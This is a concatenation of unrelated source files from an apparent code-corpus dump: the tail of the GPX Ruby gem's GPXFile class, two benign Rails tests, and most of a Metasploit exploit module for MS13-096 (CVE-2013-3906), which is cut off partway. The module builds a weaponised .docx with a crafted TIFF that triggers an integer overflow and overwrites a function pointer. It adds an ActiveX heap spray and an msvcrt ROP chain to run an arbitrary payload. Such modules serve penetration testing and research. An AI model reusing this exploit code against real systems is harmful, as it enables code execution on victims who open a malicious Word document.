DEFAULT_CREATOR = "GPX RubyGem #{GPX::VERSION} -- http://dougfales.github.io/gpx/".freeze
# This initializer can be used to create a new GPXFile from an existing
# file or to create a new GPXFile instance with no data (so that you can
# add tracks and points and write it out to a new file later).
# To read an existing GPX file, do this:
# gpx_file = GPXFile.new(:gpx_file => 'mygpxfile.gpx')
# puts "Speed: #{gpx_file.average_speed}"
# puts "Duration: #{gpx_file.duration}"
# puts "Bounds: #{gpx_file.bounds}"
#
# To read a GPX file from a string, use :gpx_data.
# gpx_file = GPXFile.new(:gpx_data => '<xml ...><gpx>...</gpx>)
# To create a new blank GPXFile instance:
# gpx_file = GPXFile.new
# Note that you can pass in any instance variables to this form of the initializer, including Tracks or Segments:
# some_track = get_track_from_csv('some_other_format.csv')
# gpx_file = GPXFile.new(:tracks => [some_track])
#
def initialize(opts = {})
@duration = 0
@attributes = {}
@namespace_defs = []
@tracks = []
@time = nil
if opts[:gpx_file] || opts[:gpx_data]
if opts[:gpx_file]
gpx_file = opts[:gpx_file]
gpx_file = File.open(gpx_file) unless gpx_file.is_a?(File)
@xml = Nokogiri::XML(gpx_file)
else
@xml = Nokogiri::XML(opts[:gpx_data])
end
gpx_element = @xml.at('gpx')
@attributes = gpx_element.attributes
@namespace_defs = gpx_element.namespace_definitions
@version = gpx_element['version']
reset_meta_data
bounds_element = (begin
@xml.at('metadata/bounds')
rescue StandardError
nil
end)
if bounds_element
@bounds.min_lat = get_bounds_attr_value(bounds_element, %w[min_lat minlat minLat])
@bounds.min_lon = get_bounds_attr_value(bounds_element, %w[min_lon minlon minLon])
@bounds.max_lat = get_bounds_attr_value(bounds_element, %w[max_lat maxlat maxLat])
@bounds.max_lon = get_bounds_attr_value(bounds_element, %w[max_lon maxlon maxLon])
else
get_bounds = true
end
@time = begin
Time.parse(@xml.at('metadata/time').inner_text)
rescue StandardError
nil
end
@name = begin
@xml.at('metadata/name').inner_text
rescue StandardError
nil
end
@description = begin
@xml.at('metadata/desc').inner_text
rescue StandardError
nil
end
@xml.search('trk').each do |trk|
trk = Track.new(element: trk, gpx_file: self)
update_meta_data(trk, get_bounds)
@tracks << trk
end
@waypoints = []
@xml.search('wpt').each { |wpt| @waypoints << Waypoint.new(element: wpt, gpx_file: self) }
@routes = []
@xml.search('rte').each { |rte| @routes << Route.new(element: rte, gpx_file: self) }
@tracks.delete_if(&:empty?)
calculate_duration
else
reset_meta_data
opts.each { |attr_name, value| instance_variable_set("@#{attr_name}", value) }
unless @tracks.nil? || @tracks.size.zero?
@tracks.each { |trk| update_meta_data(trk) }
calculate_duration
end
end
@tracks ||= []
@routes ||= []
@waypoints ||= []
end
def get_bounds_attr_value(el, possible_names)
result = nil
possible_names.each do |name|
result = el[name]
break unless result.nil?
end
(begin
result.to_f
rescue StandardError
nil
end)
end
# Returns the distance, in kilometers, meters, or miles, of all of the
# tracks and segments contained in this GPXFile.
def distance(opts = { units: 'kilometers' })
case opts[:units]
when /kilometers/i
@distance
when /meters/i
(@distance * 1000)
when /miles/i
(@distance * 0.62)
end
end
# Returns the average speed, in km/hr, meters/hr, or miles/hr, of this
# GPXFile. The calculation is based on the total distance divided by the
# sum of duration of all segments of all tracks
# (not taking into accounting pause time).
def average_speed(opts = { units: 'kilometers' })
case opts[:units]
when /kilometers/i
distance / (moving_duration / 3600.0)
when /meters/i
(distance * 1000) / (moving_duration / 3600.0)
when /miles/i
(distance * 0.62) / (moving_duration / 3600.0)
end
end
# Crops any points falling within a rectangular area. Identical to the
# delete_area method in every respect except that the points outside of
# the given area are deleted. Note that this method automatically causes
# the meta data to be updated after deletion.
def crop(area)
reset_meta_data
keep_tracks = []
tracks.each do |trk|
trk.crop(area)
unless trk.empty?
update_meta_data(trk)
keep_tracks << trk
end
end
@tracks = keep_tracks
routes.each { |rte| rte.crop(area) }
waypoints.each { |wpt| wpt.crop(area) }
end
# Deletes any points falling within a rectangular area. The "area"
# parameter is usually an instance of the Bounds class. Note that this
# method cascades into similarly named methods of subordinate classes
# (i.e. Track, Segment), which means, if you want the deletion to apply
# to all the data, you only call this one (and not the one in Track or
# Segment classes). Note that this method automatically causes the meta
# data to be updated after deletion.
def delete_area(area)
reset_meta_data
keep_tracks = []
tracks.each do |trk|
trk.delete_area(area)
unless trk.empty?
update_meta_data(trk)
keep_tracks << trk
end
end
@tracks = keep_tracks
routes.each { |rte| rte.delete_area(area) }
waypoints.each { |wpt| wpt.delete_area(area) }
end
# Resets the meta data for this GPX file. Meta data includes the bounds,
# the high and low points, and the distance.
def reset_meta_data
@bounds = Bounds.new
@highest_point = nil
@lowest_point = nil
@distance = 0.0
@moving_duration = 0.0
end
# Updates the meta data for this GPX file. Meta data includes the
# bounds, the high and low points, and the distance. This is useful when
# you modify the GPX data (i.e. by adding or deleting points) and you
# want the meta data to accurately reflect the new data.
def update_meta_data(trk, get_bounds = true)
@lowest_point = trk.lowest_point if @lowest_point.nil? || (!trk.lowest_point.nil? && (trk.lowest_point.elevation < @lowest_point.elevation))
@highest_point = trk.highest_point if @highest_point.nil? || (!trk.highest_point.nil? && (trk.highest_point.elevation > @highest_point.elevation))
@bounds.add(trk.bounds) if get_bounds
@distance += trk.distance
@moving_duration += trk.moving_duration
end
# Serialize the current GPXFile to a gpx file named <filename>.
# If the file does not exist, it is created. If it does exist, it is overwritten.
def write(filename, update_time = true)
@time = Time.now if @time.nil? || update_time
@name ||= File.basename(filename)
doc = generate_xml_doc
File.open(filename, 'w+') { |f| f.write(doc.to_xml) }
end
def to_s(update_time = true)
@time = Time.now if @time.nil? || update_time
doc = generate_xml_doc
doc.to_xml
end
def inspect
"<#{self.class.name}:...>"
end
def recalculate_distance
@distance = 0
@tracks.each do |track|
track.recalculate_distance
@distance += track.distance
end
end
private
def attributes_and_nsdefs_as_gpx_attributes
# $stderr.puts @namespace_defs.inspect
gpx_header = {}
@attributes.each do |k, v|
k = v.namespace.prefix + ':' + k if v.namespace
gpx_header[k] = v.value
end
@namespace_defs.each do |nsd|
tag = 'xmlns'
tag += ':' + nsd.prefix if nsd.prefix
gpx_header[tag] = nsd.href
end
gpx_header
end
def generate_xml_doc
@version ||= '1.1'
version_dir = version.tr('.', '/')
gpx_header = attributes_and_nsdefs_as_gpx_attributes
gpx_header['version'] = @version.to_s unless gpx_header['version']
gpx_header['creator'] = DEFAULT_CREATOR unless gpx_header['creator']
gpx_header['xsi:schemaLocation'] = "http://www.topografix.com/GPX/#{version_dir} http://www.topografix.com/GPX/#{version_dir}/gpx.xsd" unless gpx_header['xsi:schemaLocation']
gpx_header['xmlns:xsi'] = 'http://www.w3.org/2001/XMLSchema-instance' if !gpx_header['xsi'] && !gpx_header['xmlns:xsi']
# $stderr.puts gpx_header.keys.inspect
# rubocop:disable Metrics/BlockLength
doc = Nokogiri::XML::Builder.new do |xml|
xml.gpx(gpx_header) do
# version 1.0 of the schema doesn't support the metadata element, so push them straight to the root 'gpx' element
if @version == '1.0'
xml.name @name
xml.time @time.xmlschema
xml.bound(
minlat: bounds.min_lat,
minlon: bounds.min_lon,
maxlat: bounds.max_lat,
maxlon: bounds.max_lon
)
else
xml.metadata do
xml.name @name
xml.time @time.xmlschema
xml.bound(
minlat: bounds.min_lat,
minlon: bounds.min_lon,
maxlat: bounds.max_lat,
maxlon: bounds.max_lon
)
end
end
unless tracks.nil?
tracks.each do |t|
xml.trk do
xml.name t.name
t.segments.each do |seg|
xml.trkseg do
seg.points.each do |p|
xml.trkpt(lat: p.lat, lon: p.lon) do
xml.time p.time.xmlschema unless p.time.nil?
xml.ele p.elevation unless p.elevation.nil?
xml << p.extensions.to_xml unless p.extensions.nil?
end
end
end
end
end
end
end
unless waypoints.nil?
waypoints.each do |w|
xml.wpt(lat: w.lat, lon: w.lon) do
xml.time w.time.xmlschema unless w.time.nil?
Waypoint::SUB_ELEMENTS.each do |sub_elem|
xml.send(sub_elem, w.send(sub_elem)) if w.respond_to?(sub_elem) && !w.send(sub_elem).nil?
end
end
end
end
unless routes.nil?
routes.each do |r|
xml.rte do
xml.name r.name
r.points.each do |p|
xml.rtept(lat: p.lat, lon: p.lon) do
xml.time p.time.xmlschema unless p.time.nil?
xml.ele p.elevation unless p.elevation.nil?
end
end
end
end
end
end
end
# rubocop:enable Metrics/BlockLength
doc
end
# Calculates and sets the duration attribute by subtracting the time on
# the very first point from the time on the very last point.
def calculate_duration
@duration = 0
if @tracks.nil? || @tracks.size.zero? || @tracks[0].segments.nil? || @tracks[0].segments.size.zero?
return @duration
end
@duration = (@tracks[-1].segments[-1].points[-1].time - @tracks.first.segments.first.points.first.time)
rescue StandardError
@duration = 0
end
end
end
| 35.062323 | 180 | 0.580835 |
1aca907eabc3befc1685a17c342eed29d58c0744 | 915 | require "rails_helper"
RSpec.describe V1::ConversationsController, type: :routing do
describe "routing" do
it "routes to #index" do
expect(:get => "/v1/conversations").to route_to("v1/conversations#index")
end
it "routes to #show" do
expect(:get => "/v1/conversations/1").to route_to("v1/conversations#show", :id => "1")
end
it "routes to #create" do
expect(:post => "/v1/conversations").to route_to("v1/conversations#create")
end
it "routes to #update via PUT" do
expect(:put => "/v1/conversations/1").to route_to("v1/conversations#update", :id => "1")
end
it "routes to #update via PATCH" do
expect(:patch => "/v1/conversations/1").to route_to("v1/conversations#update", :id => "1")
end
it "routes to #destroy" do
expect(:delete => "/v1/conversations/1").to route_to("v1/conversations#destroy", :id => "1")
end
end
end
| 30.5 | 98 | 0.634973 |
e9fe18a7cea6663eee62975f684f83f55646d19a | 1,424 | require 'test_helper'
class PrinciplesControllerTest < ActionController::TestCase
setup do
@principle = principles(:one)
end
test "should get index" do
get :index
assert_response :success
assert_not_nil assigns(:principles)
end
test "should get new" do
get :new
assert_response :success
end
test "should create principle" do
assert_difference('Principle.count') do
post :create, principle: { author: @principle.author, case_webpage: @principle.case_webpage, casestudy: @principle.casestudy, description: @principle.description, image: @principle.image, title: @principle.title }
end
assert_redirected_to principle_path(assigns(:principle))
end
test "should show principle" do
get :show, id: @principle
assert_response :success
end
test "should get edit" do
get :edit, id: @principle
assert_response :success
end
test "should update principle" do
patch :update, id: @principle, principle: { author: @principle.author, case_webpage: @principle.case_webpage, casestudy: @principle.casestudy, description: @principle.description, image: @principle.image, title: @principle.title }
assert_redirected_to principle_path(assigns(:principle))
end
test "should destroy principle" do
assert_difference('Principle.count', -1) do
delete :destroy, id: @principle
end
assert_redirected_to principles_path
end
end
| 28.48 | 234 | 0.731742 |
d580f94d13afac96929fefa0b2083d965a64c6df | 30,571 | ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex/zip'
require 'nokogiri'
module ::Nokogiri
module XML
class Builder
#
# Some XML documents don't declare the namespace before referencing, but Nokogiri requires one.
# So here's our hack to get around that by adding a new custom method to the Builder class
#
def custom_root(ns)
e = @parent.create_element(ns)
e.add_namespace_definition(ns, "href")
@ns = e.namespace_definitions.find { |x| x.prefix == ns.to_s }
return self
end
end
end
end
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::RopDb
def initialize(info={})
super(update_info(info,
'Name' => "MS13-096 Microsoft Tagged Image File Format (TIFF) Integer Overflow",
'Description' => %q{
This module exploits a vulnerability found in Microsoft's Tagged Image File Format.
It was originally discovered in the wild, targeting Windows XP and Windows Server 2003
users running Microsoft Office, specifically in the Middle East and South Asia region.
The flaw is due to a DWORD value extracted from the TIFF file that is embedded as a
drawing in Microsoft Office, and how it gets calculated with user-controlled inputs,
and stored in the EAX register. The 32-bit register will run out of storage space to
represent the large vlaue, which ends up being 0, but it still gets pushed as a
dwBytes argumenet (size) for a HeapAlloc call. The HeapAlloc function will allocate a
chunk anyway with size 0, and the address of this chunk is used as the destination buffer
of a memcpy function, where the source buffer is the EXIF data (an extended image format
supported by TIFF), and is also user-controlled. A function pointer in the chunk returned
by HeapAlloc will end up being overwritten by the memcpy function, and then later used
in OGL!GdipCreatePath. By successfully controlling this function pointer, and the
memory layout using ActiveX, it is possible to gain arbitrary code execution under the
context of the user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # Some dude wrote it and deployed in the wild, but Haifei Li spotted it
'sinn3r' # Metasploit
],
'References' =>
[
[ 'CVE', '2013-3906' ],
[ 'MSB', 'MS13-096' ],
[ 'OSVDB', '99376' ],
[ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2896666' ],
[ 'URL', 'http://blogs.technet.com/b/srd/archive/2013/11/05/cve-2013-3906-a-graphics-vulnerability-exploited-through-word-documents.aspx' ]
],
'Payload' =>
{
'PrependEncoder' => "\x64\xa1\x18\x00\x00\x00" + # mov eax, fs:[0x18]
"\x83\xC0\x08" + # add eax, byte 8
"\x8b\x20" + # mov esp, [eax]
"\x81\xC4\x30\xF8\xFF\xFF", # add esp, -2000
'BadChars' => "\x00"
},
'DefaultOptions' =>
{
'ExitFunction' => "process",
'PrependMigrate' => true
},
'Platform' => 'win',
'Targets' =>
[
# XP SP3 + Office 2010 Standard (14.0.6023.1000 32-bit)
['Windows XP SP3 with Office Standard 2010', {}],
],
'Privileged' => false,
'DisclosureDate' => "Nov 5 2013", # Microsoft announcement
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [true, 'The docx file', 'msf.docx']),
], self.class)
end
#
# Creates a TIFF that triggers the overflow
#
def make_tiff
# TIFF Header:
# TIFF ID = 'II' (Intel order)
# TIFF Version = 42d
# Offset of FID = 0x000049c8h
#
# Image Directory:
# Number of entries = 17d
# Entry[0] NewSubFileType = 0
# Entry[1] ImageWidth = 256d
# Entry[2] ImageHeight = 338d
# Entry[3] BitsPerSample = 8 8 8
# Entry[4] Compression = JPEG (6)
# Entry[5] Photometric Interpretation = RGP
# Entry[6] StripOffsets = 68 entries (349 bytes)
# Entry[7] SamplesPerPixel = 3
# Entry[8] RowsPerStrip = 5
# Entry[9] StripByteCounts = 68 entries (278 bytes)
# Entry[10] XResolution = 96d
# Entry[11] YResolution = 96d
# Entry[12] Planar Configuration = Clunky
# Entry[13] Resolution Unit = Inch
# Entry[14] Predictor = None
# Entry[15] JPEGInterchangeFormatLength = 5252h (1484h)
# Entry[16] JPEGInterchangeFormat = 13636d
# Notes:
# These values are extracted from the file to calculate the HeapAlloc size that result in the overflow:
# - JPEGInterchangeFormatLength
# - DWORD at offset 3324h (0xffffb898), no documentation for this
# - DWORDS after offset 3328h, no documentation for these, either.
# The DWORD at offset 4874h is what ends up overwriting the function pointer by the memcpy
# The trigger is really a TIF file, but is named as a JPEG in the docx package
buf = ''
path = ::File.join(Msf::Config.data_directory, "exploits", "CVE-2013-3906", "word", "media", "image1.jpeg")
::File.open(path, "rb") do |f|
buf = f.read
end
# Gain control of the call [eax+50h] instruction
# XCHG EAX, ESP; RETN msvcrt
buf[0x4874, 4] = [0x200F0700-0x50].pack('V')
buf
end
#
# Generates a payload
#
def get_rop_payload
p = ''
p << [0x77c15ed5].pack('V') # XCHG EAX, ESP msvcrt
p << generate_rop_payload('msvcrt','',{'target'=>'xp'})
p << payload.encoded
block = p
block << rand_text_alpha(1024 - 80 - p.length)
block << [ 0x77c34fbf, 0x200f0704 ].pack("V*") # pop esp # ret # from msvcrt
block << rand_text_alpha(1024 - block.length)
buf = ''
while (buf.length < 0x80000)
buf << block
end
buf
end
#
# Creates an ActiveX bin that will be used as a spray in Office
#
def make_activex_bin
#
# How an ActiveX bin is referred:
# document.xml.rels -> ActiveX[num].xml -> activeX[num].xml.rels -> ActiveX[num].bin
# Every bin is a Microsoft Compound Document File:
# http://www.openoffice.org/sc/compdocfileformat.pdf
# The bin file
mscd = ''
mscd << [0xe011cfd0].pack('V') # File identifier (first 4 byte)
mscd << [0xe11ab1a1].pack('V') # File identifier (second 4 byte)
mscd << [0x00000000].pack('V') * 4 # Unique Identifier
mscd << [0x003e].pack('v') # Revision number
mscd << [0x0003].pack('v') # Version number
mscd << [0xfffe].pack('v') # Byte order: Little-Endian
mscd << [0x0009].pack('v') # Sector size
mscd << [0x0006].pack('v') # Size of a short-sector
mscd << "\x00" * 10 # Not used
mscd << [0x00000001].pack('V') # Total number of sectors
mscd << [0x00000001].pack('V') # SecID for the first sector
mscd << [0x00000000].pack('V') # Not used
mscd << [0x00001000].pack('V') # Minimum size of a standard stream
mscd << [0x00000002].pack('V') # Sec ID of first sector
mscd << [0x00000001].pack('V') # Total number of sectors for the short-sector table
mscd << [0xfffffffe].pack('V') # SecID of first sector of the mastser sector table
mscd << [0x00000000].pack('V') # Total number of sectors for master sector talbe
mscd << [0x00000000].pack('V') # SecIDs
mscd << [0xffffffff].pack('V') * 4 * 59 # SecIDs
mscd[0x200, 4] = [0xfffffffd].pack('V')
mscd[0x204, 12] = [0xfffffffe].pack('V') * 3
mscd << Rex::Text.to_unicode("Root Entry")
mscd << [0x00000000].pack('V') * 11
mscd << [0x0016].pack('v') # Valid range of the previous char array
mscd << "\x05" # Type of entry (Root Storage Entry)
mscd << "\x00" # Node colour of the entry (red)
mscd << [0xffffffff].pack('V') # DirID of the left child node
mscd << [0xffffffff].pack('V') # DirID of the right child node
mscd << [0x00000001].pack('V') # DirID of the root node entry
mscd << [0x1efb6596].pack('V')
mscd << [0x11d1857c].pack('V')
mscd << [0xc0006ab1].pack('V')
mscd << [0x283628f0].pack('V')
mscd << [0x00000000].pack('V') * 3
mscd << [0x287e3070].pack('V')
mscd << [0x01ce2654].pack('V')
mscd << [0x00000003].pack('V')
mscd << [0x00000100].pack('V')
mscd << [0x00000000].pack('V')
mscd << Rex::Text.to_unicode("Contents")
mscd << [0x00000000].pack('V') * 12
mscd << [0x01020012].pack('V')
mscd << [0xffffffff].pack('V') * 3
mscd << [0x00000000].pack('V') * 10
mscd << [0x000000e4].pack('V')
mscd << [0x00000000].pack('V') * 18
mscd << [0xffffffff].pack('V') * 3
mscd << [0x00000000].pack('V') * 29
mscd << [0xffffffff].pack('V') * 3
mscd << [0x00000000].pack('V') * 12
mscd << [0x00000001].pack('V')
mscd << [0x00000002].pack('V')
mscd << [0x00000003].pack('V')
mscd << [0xfffffffe].pack('V')
mscd << [0xffffffff].pack('V') * 32 #52
mscd << [0x77c34fbf].pack('V') # POP ESP # RETN
mscd << [0x200f0704].pack('V') # Final payload target address to begin the ROP
mscd << [0xffffffff].pack('V') * 18
mscd << @rop_payload
mscd
end
#
# Creates an activeX[num].xml file
# @param rid [String] The relationship ID (example: rId1)
# @return [String] XML document
#
def make_activex_xml(rid)
attrs = {
'ax:classid' => "{1EFB6596-857C-11D1-B16A-00C0F0283628}",
'ax:license' => "9368265E-85FE-11d1-8BE3-0000F8754DA1",
'ax:persistence' => "persistStorage",
'r:id' => "rId#{rid.to_s}",
'xmlns:ax' => "http://schemas.microsoft.com/office/2006/activeX",
'xmlns:r' => @schema
}
md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"no\"?>")
builder = ::Nokogiri::XML::Builder.with(md) do |xml|
xml.custom_root("ax")
xml.ocx(attrs)
end
builder.to_xml(:indent => 0)
end
#
# Creates an activeX[num].xml.rels
# @param relationships [Array] A collection of hashes with each containing:
# :id, :type, :target
# @return [String] XML document
#
def make_activex_xml_reals(rid, target_bin)
acx_type = "http://schemas.microsoft.com/office/2006/relationships/activeXControlBinary"
md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>")
builder = ::Nokogiri::XML::Builder.with(md) do |xml|
xml.Relationships('xmlns'=>"http://schemas.openxmlformats.org/package/2006/relationships") do
xml.Relationship({:Id=>"rId#{rid.to_s}", :Type=>acx_type, :Target=>target_bin})
end
end
builder.to_xml(:indent => 0)
end
#
# Creates a document.xml.reals file
# @param relationships [Array] A collection of hashes with each containing:
# :id, :type, and :target
# @return [String] XML document
#
def make_doc_xml_reals(relationships)
md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>")
builder = ::Nokogiri::XML::Builder.with(md) do |xml|
xml.Relationships('xmlns'=>"http://schemas.openxmlformats.org/package/2006/relationships") do
relationships.each do |r|
xml.Relationship({:Id=>"rId#{r[:id].to_s}", :Type=>r[:type], :Target=>r[:target]})
end
end
end
builder.to_xml(:indent => 0)
end
#
# Creates a _rels/.rels file
#
def init_rels(doc_xml, doc_props)
rels = []
rels << doc_xml
rels << doc_props
rels = rels.flatten
md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>")
builder = ::Nokogiri::XML::Builder.with(md) do |xml|
xml.Relationships('xmlns'=>"http://schemas.openxmlformats.org/package/2006/relationships") do
rels.each do |r|
xml.Relationship({:Id=>"rId#{r[:id].to_s}", :Type=>r[:type], :Target=>r[:fname].gsub(/^\//, '')})
end
end
end
{
:fname => "_rels/.rels",
:data => builder.to_xml(:indent => 0)
}
end
#
# Creates a run element for chart
# @param xml [Element]
# @param rid [String]
#
def create_chart_run_element(xml, rid)
drawingml_schema = "http://schemas.openxmlformats.org/drawingml/2006"
xml.r do
xml.rPr do
xml.noProof
xml.lang({'w:val' => "en-US"})
end
xml.drawing do
xml['wp'].inline({'distT'=>"0", 'distB'=>"0", 'distL'=>"0", 'distR'=>"0"}) do
xml['wp'].extent({'cx'=>'1', 'cy'=>'1'})
xml['wp'].effectExtent({'l'=>"1", 't'=>"0", 'r'=>"1", 'b'=>"0"})
xml['wp'].docPr({'id'=>rid.to_s, 'name' => "drawing #{rid.to_s}"})
xml['wp'].cNvGraphicFramePr
xml['a'].graphic do
xml['a'].graphicData({'uri'=>"#{drawingml_schema}/chart"}) do
xml['c'].chart({'r:id'=>"rId#{rid.to_s}"})
end
end
end
end
end
end
#
# Creates a run element for ax
# @param xml [Element]
# @param rid [String]
#
def create_ax_run_element(xml, rid)
shape_attrs = {
'id' => "_x0000_i10#{rid.to_s}",
'type' => "#_x0000_t75",
'style' => "width:1pt;height:1pt",
'o:ole' => ""
}
control_attrs = {
'r:id' => "rId#{rid.to_s}",
'w:name' => "TabStrip#{rid.to_s}",
'w:shapeid' =>"_x0000_i10#{rid.to_s}"
}
xml.r do
xml.object({'w:dxaOrig'=>"1440", 'w:dyaOrig'=>"1440"}) do
xml['v'].shape(shape_attrs)
xml['w'].control(control_attrs)
end
end
end
#
# Creates a pic run element
# @param xml [Element]
# @param rid [String]
#
def create_pic_run_element(xml, rid)
drawinxml_schema = "http://schemas.openxmlformats.org/drawingml/2006"
xml.r do
xml.rPr do
xml.noProof
xml.lang({'w:val'=>"en-US"})
end
xml.drawing do
xml['wp'].inline({'distT'=>"0", 'distB'=>"0", 'distL'=>"0", 'distR'=>"0"}) do
xml.extent({'cx'=>'1', 'cy'=>'1'})
xml['wp'].effectExtent({'l'=>"1", 't'=>"0", 'r'=>"0", 'b'=>"0"})
xml['wp'].docPr({'id'=>rid.to_s, 'name'=>"image", 'descr'=>"image.jpeg"})
xml['wp'].cNvGraphicFramePr do
xml['a'].graphicFrameLocks({'xmlns:a'=>"#{drawinxml_schema}/main", 'noChangeAspect'=>"1"})
end
xml['a'].graphic({'xmlns:a'=>"#{drawinxml_schema}/main"}) do
xml['a'].graphicData({'uri'=>"#{drawinxml_schema}/picture"}) do
xml['pic'].pic({'xmlns:pic'=>"#{drawinxml_schema}/picture"}) do
xml['pic'].nvPicPr do
xml['pic'].cNvPr({'id'=>rid.to_s, 'name'=>"image.jpeg"})
xml['pic'].cNvPicPr
end
xml['pic'].blipFill do
xml['a'].blip('r:embed'=>"rId#{rid.to_s}", 'cstate'=>"print")
xml['a'].stretch do
xml['a'].fillRect
end
end
xml['pic'].spPr do
xml['a'].xfrm do
xml['a'].off({'x'=>"0", 'y'=>"0"})
xml['a'].ext({'cx'=>"1", 'cy'=>"1"})
end
xml['a'].prstGeom({'prst' => "rect"}) do
xml['a'].avLst
end
end
end
end
end
end
end
end
end
#
# Creates a document.xml file
# @param pre_defs [Array]
# @param activex [Array]
# @param tiff_file [Array]
# @return [String] XML document
#
def init_doc_xml(last_rid, pre_defs, activex, tiff_file)
# Get all the required pre-defs
chart_rids = []
pre_defs.select { |e| chart_rids << e[:id] if e[:fname] =~ /\/word\/charts\//}
# Get all the ActiveX RIDs
ax_rids = []
activex.select { |e| ax_rids << e[:id] }
# Get the TIFF RID
tiff_rid = tiff_file[:id]
# Documentation on how this is crafted:
# http://msdn.microsoft.com/en-us/library/office/gg278308.aspx
doc_attrs = {
'xmlns:ve' => "http://schemas.openxmlformats.org/markup-compatibility/2006",
'xmlns:o' => "urn:schemas-microsoft-com:office:office",
'xmlns:r' => @schema,
'xmlns:m' => "http://schemas.openxmlformats.org/officeDocument/2006/math",
'xmlns:v' => "urn:schemas-microsoft-com:vml",
'xmlns:wp' => "http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing",
'xmlns:w10' => "urn:schemas-microsoft-com:office:word",
'xmlns:w' => "http://schemas.openxmlformats.org/wordprocessingml/2006/main",
'xmlns:wne' => "http://schemas.microsoft.com/office/word/2006/wordml",
'xmlns:a' => "http://schemas.openxmlformats.org/drawingml/2006/main",
'xmlns:c' => "http://schemas.openxmlformats.org/drawingml/2006/chart"
}
p_attrs_1 = {'w:rsidR' => "00F8254F", 'w:rsidRDefault' => "00D15BD0" }
p_attrs_2 = {'w:rsidR' => "00D15BD0", 'w:rsidRPr' =>"00D15BD0", 'w:rsidRDefault' => "00D15BD0" }
md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>")
builder = ::Nokogiri::XML::Builder.with(md) do |xml|
xml.custom_root("w")
xml.document(doc_attrs) do
xml.body do
# Paragraph (ActiveX)
xml.p(p_attrs_1) do
# Paragraph properties
xml.pPr do
# Run properties
xml.rPr do
xml.lang({'w:val' => "en-US"})
end
end
ax_rids.each do |rid|
create_ax_run_element(xml, rid)
end
end
xml.p(p_attrs_2) do
xml.pPr do
xml.rPr do
xml['w'].lang({'w:val'=>"en-US"})
end
end
# Charts
chart_rids.each do |rid|
create_chart_run_element(xml, rid)
end
# TIFF
create_pic_run_element(xml, tiff_rid)
end
end
end
end
{
:id => (last_rid + 1).to_s,
:type => "#{@schema}/officeDocument",
:fname => "/word/document.xml",
:content_type => "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml",
:xml => builder.to_xml(:indent => 0)
}
end
#
# Creates a [Content.Types].xml file located in the parent directory
# @param overrides [Array] A collection of hashes with each containing
# the :PartName and :ContentType info
# @return [String] XML document
#
def make_contenttype_xml(overrides)
contenttypes = [
{
:Extension => "rels",
:ContentType => "application/vnd.openxmlformats-package.relationships+xml"
},
{
:Extension => "xml",
:ContentType => "application/xml"
},
{
:Extension => "jpeg",
:ContentType => "image/jpeg"
},
{
:Extension => "bin",
:ContentType => "application/vnd.ms-office.activeX"
},
{
:Extension => "xlsx",
:ContentType => "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet"
}
]
md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>")
builder = ::Nokogiri::XML::Builder.with(md) do |xml|
xml.Types({'xmlns'=>"http://schemas.openxmlformats.org/package/2006/content-types"}) do
# Default extensions
contenttypes.each do |contenttype|
xml.Default(contenttype)
end
# Additional overrides
overrides.each do |override|
override_attrs = {
:PartName => override[:PartName] || override[:fname],
:ContentType => override[:ContentType]
}
xml.Override(override_attrs)
end
end
end
builder.to_xml(:indent => 0)
end
#
# Pre-define some items that will be used in .rels
#
def init_doc_props(last_rid)
items = []
items << {
:id => (last_rid += 1),
:type => "#{@schema}/extended-properties",
:fname => "/docProps/app.xml",
:content_type => "application/vnd.openxmlformats-officedocument.extended-properties+xml"
}
items << {
:id => (last_rid += 1),
:type => "http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties",
:fname => "/docProps/core.xml",
:content_type => "application/vnd.openxmlformats-package.core-properties+xml"
}
return last_rid, items
end
#
# Pre-define some items that will be used in document.xml.rels
#
def init_doc_xml_rels_items(last_rid)
items = []
items << {
:id => (last_rid += 1),
:type => "#{@schema}/styles",
:fname => "/word/styles.xml",
:content_type => "application/vnd.openxmlformats-officedocument.wordprocessingml.styles+xml"
}
items << {
:id => (last_rid += 1),
:type => "#{@schema}/settings",
:fname => "/word/settings.xml",
:content_type => "application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"
}
items << {
:id => (last_rid += 1),
:type => "#{@schema}/webSettings",
:fname => "/word/webSettings.xml",
:content_type => "application/vnd.openxmlformats-officedocument.wordprocessingml.webSettings+xml"
}
items << {
:id => (last_rid += 1),
:type => "#{@schema}/fontTable",
:fname => "/word/fontTable.xml",
:content_type => "application/vnd.openxmlformats-officedocument.wordprocessingml.fontTable+xml"
}
items << {
:id => (last_rid += 1),
:type => "#{@schema}/theme",
:fname => "/word/theme/theme1.xml",
:content_type => "application/vnd.openxmlformats-officedocument.theme+xml"
}
items << {
:id => (last_rid += 1),
:type => "#{@schema}/chart",
:fname => "/word/charts/chart1.xml",
:content_type => "application/vnd.openxmlformats-officedocument.drawingml.chart+xml"
}
items << {
:id => (last_rid += 1),
:type => "#{@schema}/chart",
:fname => "/word/charts/chart2.xml",
:content_type => "application/vnd.openxmlformats-officedocument.drawingml.chart+xml"
}
items << {
:id => (last_rid += 1),
:type => "#{@schema}/chart",
:fname => "/word/charts/chart3.xml",
:content_type => "application/vnd.openxmlformats-officedocument.drawingml.chart+xml"
}
items << {
:id => (last_rid += 1),
:type => "#{@schema}/chart",
:fname => "/word/charts/chart4.xml",
:content_type => "application/vnd.openxmlformats-officedocument.drawingml.chart+xml"
}
items << {
:id => (last_rid += 1),
:type => "#{@schema}/chart",
:fname => "/word/charts/chart5.xml",
